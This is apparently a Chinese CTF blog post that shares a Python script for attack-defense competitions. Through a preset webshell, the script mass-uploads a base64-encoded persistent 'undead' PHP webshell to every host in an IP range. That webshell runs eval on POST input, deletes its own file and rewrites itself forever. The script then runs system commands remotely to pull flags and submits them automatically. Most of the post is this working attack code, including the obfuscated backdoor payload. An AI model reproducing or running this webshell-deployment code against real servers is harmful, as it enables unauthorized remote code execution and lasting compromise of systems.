前几天祥云杯决赛,看到学弟们要跑好几个脚本,还得手动提交flag,浪费大量时间,以至于没有足够的时间来挖掘漏洞。所以搞了个脚本来简化一下操作。
注:本脚本是利用预留后门只起到辅助作用,不要过分依赖。掌握技术,挖掘漏洞才是最重要的。
0x00 脚本功能
- 利用预留后门批量上传不死马
- 自动激活不死马
- 根据设置的每轮比赛时间,自动获取flag并自动提交
0x01 脚本使用
在物理机上用python3跑就行
注:自动提交flag需在脚本里设置对应的post参数,不同比赛提交方式不一样,大家自行修改。
0x02 脚本代码
# -*- coding: utf-8 -*-
# SmoothAttack V1.0
# Author: 7i4n2h3n9
# Team: Polar Day Cyberspace Security LAB
import time
import requests
import webbrowser
# Starting Option
def welmemu():
r_t = input('Please input the round time(min):')
i_l = input('Please input the ip segment(eg:192.169.10.2-192.169.10.40):')
s_d = input('Please input the shell dir(eg:/upload/1.php):')
h_p = input('Please input the port of http server:')
s_p = input('Please input the password of webshell:')
t_k = input('Please input the token:')
return r_t,i_l,s_d,h_p,s_p,t_k
def dir_re(shell_dir):
s_dd = shell_dir.split('/')
s_d_c = len(s_dd)
busi_dir = shell_dir.replace(s_dd[s_d_c - 1],'jjnb.php')
return busi_dir
#Ip Analysis
def ipAnalysis(ipl):
ip_b = []
ip_ta = ipl.split('-')
ip_1 = ip_ta[0].split('.')
ip_2 = ip_ta[1].split('.')
ip_f = str(ip_1[0]) + '.' + str(ip_1[1]) + '.' + str(ip_1[2])
for i in range(int(ip_1[3]),int(ip_2[3]) + 1):
ip_tb = ip_f + '.' + str(i)
ip_b.append(ip_tb)
return ip_b
# Upload BuSi Webshell
def upWebshell(ip, port, passwd, shell, bs_dir):
suc_ipl = []
# The md5 pass of busiwebshell is polarnight, post pass is jjnb
pay = "file_put_contents('./jjnb.php',base64_decode('PD9waHAgIA0KICAgIHNldF90aW1lX2xpbWl0KDApOyAgDQogICAgaWdub3JlX3VzZXJfYWJvcnQoMSk7ICANCiAgICB1bmxpbmsoX19GSUxFX18pOyAgDQogICAgd2hpbGUoMSl7ICANCiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJy5sbmRleC5waHAnLCc8P3BocCBpZihtZDUoJF9HRVRbInBhc3MiXSk9PSJiMGQyOWQ4NTIyZWNiNGU2YTE1YTFiMGMwNmJjZDNkOSIpe0BldmFsKCRfUE9TVFtqam5iXSk7fSA/PicpOyAgDQogICAgICAgIHNsZWVwKDApOyAgDQogICAgfQ0KPz4'));"
pay1 = "system('find /var/www/html -name .lndex.php');"
for j in ip:
url = 'http://' + j
r = conWebshell(url, shell, passwd, port, pay)
bsd = url + bs_dir
try:
webbrowser.open(bsd)
time.sleep(1)
except:
pass
r1 = conWebshell(url, shell, passwd, port, pay1)
if 'lndex' in r1.text:
suc_ipl.append(j)
return suc_ipl
# Connecting Webshell
def conWebshell(url, shell, passwd, port, pay):
payload = {
passwd:pay
}
url1 = url + ':' + port + shell
response = requests.post(url1, payload)
return response
def get_flag(ip, port, shell, passwd):
flag = []
g_flag_pay = "system('getflag');"
for p in ip:
url = 'http://' + p
r = conWebshell(url, shell, passwd, port, g_flag_pay)
flag.append(r.text)
return flag
def sub_flag(r_time, ip, port, shell, passwd, token):
#Set submit flag url
f_url = 'http://192.168.0.1'
#Set token
while True:
for q in ip:
flag_tmp = get_flag(q, port, shell, passwd)
s_f_pay = {
'flag':flag_tmp,
'token':token
}
r = requests.post(f_url,s_f_pay)
print(r.text)
time.sleep(r_time * 60)
if __name__ == '__main__' :
round_time, ip_list, shell_dir, http_port, shell_pass, token = welmemu()
busi_dir = dir_re(shell_dir)
busi_passwd = 'jjnb'
print(busi_dir)
ip_seg = ipAnalysis(ip_list)
#print(ip_seg)
succe_iplist = upWebshell(ip_seg, http_port, shell_pass, shell_dir, busi_dir)
print(succe_iplist)
sub_flag(round_time, succe_iplist, http_port, busi_dir, busi_passwd, token)